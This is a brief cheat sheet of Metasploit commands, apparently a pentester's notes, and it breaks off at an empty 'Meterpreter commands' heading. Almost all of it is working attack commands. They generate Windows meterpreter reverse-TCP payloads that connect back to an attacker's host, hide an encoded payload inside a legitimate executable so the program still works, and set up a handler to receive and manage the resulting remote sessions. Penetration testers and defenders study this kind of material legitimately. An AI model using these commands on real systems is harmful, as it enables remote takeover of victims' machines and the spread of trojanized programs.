

# Metasploit Basics


### Payload generation

Raw meterpreter payload generation

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 R

PE meterpreter executable generation

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X > test.exe



### Executable infection and encodings

Infect an executable with encoded payload without compromising it's functionalities

	msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x original_file.exe -k -o output.exe 



### Meterpreter Sessions

Prepare the handler for meterpreter sessions with `msfconsole`

	msf > use exploit/multi/handler
	msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
	msf exploit(handler) > set LPORT 4444
	msf exploit(handler) > run

Session management
	
	msf > sessions -l         # list active sessions
	msf > sessions -i <SESSID>    # switch to session <SESSID>

Quick way

	msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=4444 E

### Meterpreter commands
	
